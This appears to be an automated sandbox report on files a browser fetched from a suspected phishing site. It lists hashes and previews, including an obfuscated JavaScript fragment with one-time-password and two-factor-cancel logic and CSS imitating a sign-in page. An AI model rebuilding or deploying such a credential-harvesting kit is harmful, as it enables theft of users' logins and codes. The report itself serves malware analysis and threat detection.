                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):120390
                                                        Entropy (8bit):5.190875566468324
                                                        Encrypted:false
                                                        SSDEEP:3072:/Q8gPjG43G047SP47c1+CP4tUgz7eGAzAuCsb:cCsb
                                                        MD5:FF20110ACBB247BA1E31E0AE410B6EC8
                                                        SHA1:382B6D509A92EEA89A7162F67BEEC2DDC3365952
                                                        SHA-256:BA7433867699A191306DC3D4A7177A1B37BB315963770004F9996E5918ED90C1
                                                        SHA-512:63C1135713A131BF6B93E07E3FB956D216A813943E8A889C7A2D646FA8526A83B7E02512E13DCCC16DBBE15A9BE8B18085D382E6ECA5D52AAC7A8B71855F8C2F
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:const _0x6a4795=_0x521e;(function(_0x33cd6e,_0x44b3f1){const _0x175f50=_0x521e,_0x3e19d6=_0x33cd6e();while(!![]){try{const _0x183a15=parseInt(_0x175f50(0x75))/0x1+parseInt(_0x175f50(0xcd))/0x2+parseInt(_0x175f50(0x233))/0x3*(-parseInt(_0x175f50(0x1f5))/0x4)+parseInt(_0x175f50(0x134))/0x5+-parseInt(_0x175f50(0x135))/0x6+parseInt(_0x175f50(0x12a))/0x7*(parseInt(_0x175f50(0x18f))/0x8)+-parseInt(_0x175f50(0x1ca))/0x9;if(_0x183a15===_0x44b3f1)break;else _0x3e19d6['push'](_0x3e19d6['shift']());}catch(_0x397690){_0x3e19d6['push'](_0x3e19d6['shift']());}}}(_0x419e,0xd216d));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null;function _0x419e(){const _0x3da865=['waiting\x20for\x20previous\x20request\x20to\x20complete','phone\x20otp','112504WRrgbA','section_multipleaccounts','linkoptionclick(this)','protectoptions','img','text-left','body','error_uname_pdf','a_id','valid\x20otp',
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1434), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1434
                                                        Entropy (8bit):5.753879254497127
                                                        Encrypted:false
                                                        SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtm1+7E/6kKsQ:VKEctKo7LmvtUjPKtX7Q1+gCkbLrwUnG
                                                        MD5:8C42AEB65A5E249CDAC026525C9262CA
                                                        SHA1:6224FC6FC3CF389B257B8F2405A466FD60EBB5E7
                                                        SHA-256:7CB7B3E07675CD1ED331968CDC8E63CADE8B8CFF7BB3A60A7B8D74129E8DBFDA
                                                        SHA-512:1A4D62A054B3353F0A72756D3079F0EE9E3E57B47FC669851966CCDFDC9A269BA6909A1A4E68B7C75822E3534C5EEA41C546E1C59C721B8876A87EDD5180641A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):35970
                                                        Entropy (8bit):7.989503040923577
                                                        Encrypted:false
                                                        SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                        MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                        SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                        SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                        SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/12KYWgiq1CIPJtcA56dot1AeMqr50
                                                        Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):1864
                                                        Entropy (8bit):5.222032823730197
                                                        Encrypted:false
                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (23791), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):23791
                                                        Entropy (8bit):5.1072229992803955
                                                        Encrypted:false
                                                        SSDEEP:384:OtafGtz2omXX44PL5Ky0sdY8xbXob4YEb+VkfipSgfW:GafSz2omXX44PL5Ky0sdY8xbXoEYw+5K
                                                        MD5:47289A0F6E78A5C3D0ED9F106B54C18D
                                                        SHA1:EA7DD31AB9B7B5DEC4208BC99DA3E619603F30BB
                                                        SHA-256:149AEFB00EC81D50A350C9800FDF3E35529386515B1FB9058AB083632D995447
                                                        SHA-512:DF502318A12E569B89AF12636A56F1F6B5D86AE238CD79453B4A7AA84897D54C842D8FB6FB198ABAC22E362F8A1DE716D535D7A0325EB3105DECECAF7CF0BEED
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/34PjDiabG2bEMu6719
                                                        Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 45 x 64, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):3.982173679986101
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlyt+MMl/xl/k4E08up:6v/lhPJMk/7Tp
                                                        MD5:8D90D8C33D6FCBB7CFAA7F68383802D7
                                                        SHA1:5E16DA8EC40FD6520D12B958E3250DAFA486C4E9
                                                        SHA-256:216E9C1D7C9E14229941F2BE06ABAF5AEAF1E84BAC9CFE2146BFA157CD659849
                                                        SHA-512:38A08A1BED207B2644533C5DD42B0D93FC3F4A53A37A9D09A90DFE1071F850A3818F6FF2FFF1E6FBE0CA414552300C2D6827445D35651E1D7F0C6F995F307D16
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_
                                                        Preview:.PNG........IHDR...-...@.......iI....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):7390
                                                        Entropy (8bit):4.02755241095864
                                                        Encrypted:false
                                                        SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161
                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):10796
                                                        Entropy (8bit):7.946024875001343
                                                        Encrypted:false
                                                        SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (10017)
                                                        Category:downloaded
                                                        Size (bytes):10245
                                                        Entropy (8bit):5.437589264532084
                                                        Encrypted:false
                                                        SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T130616Z&X-Amz-Expires=300&X-Amz-Signature=012060cabb4d90d7bb147ccc7111563bd05e78b595e483f09ff2bc4e80b1baaf&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                        Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (10017)
                                                        Category:dropped
                                                        Size (bytes):10245
                                                        Entropy (8bit):5.437589264532084
                                                        Encrypted:false
                                                        SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1434), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1434
                                                        Entropy (8bit):5.753879254497127
                                                        Encrypted:false
                                                        SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtm1+7E/6kKsQ:VKEctKo7LmvtUjPKtX7Q1+gCkbLrwUnG
                                                        MD5:8C42AEB65A5E249CDAC026525C9262CA
                                                        SHA1:6224FC6FC3CF389B257B8F2405A466FD60EBB5E7
                                                        SHA-256:7CB7B3E07675CD1ED331968CDC8E63CADE8B8CFF7BB3A60A7B8D74129E8DBFDA
                                                        SHA-512:1A4D62A054B3353F0A72756D3079F0EE9E3E57B47FC669851966CCDFDC9A269BA6909A1A4E68B7C75822E3534C5EEA41C546E1C59C721B8876A87EDD5180641A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.google.com/recaptcha/api.js
                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):270
                                                        Entropy (8bit):4.840496990713235
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):550905
                                                        Entropy (8bit):5.666803401551392
                                                        Encrypted:false
                                                        SSDEEP:6144:kOYnKXi2tpKdoYRMXT+gVL+r+53bl2tjig1yKeVQqNFcU9i1d7sLO1OiUBI2+e:k9KXv3eUvVl2RiKeVHFD9igS0INe
                                                        MD5:C7BE68088B0A823F1A4C1F77C702D1B4
                                                        SHA1:05D42D754AFD21681C0E815799B88FBE1FBABF4E
                                                        SHA-256:4943E91F7F53318D481CA07297395ABBC52541C2BE55D7276ECDA152CD7AD9C3
                                                        SHA-512:CB76505845E7FC0988ADE0598E6EA80636713E20209E1260EE4413423B45235F57CB0A33FCA7BAF223E829835CB76A52244C3197E4C0C166DAD9B946B9285222
                                                        Malicious:false
                                                        Reputation:low
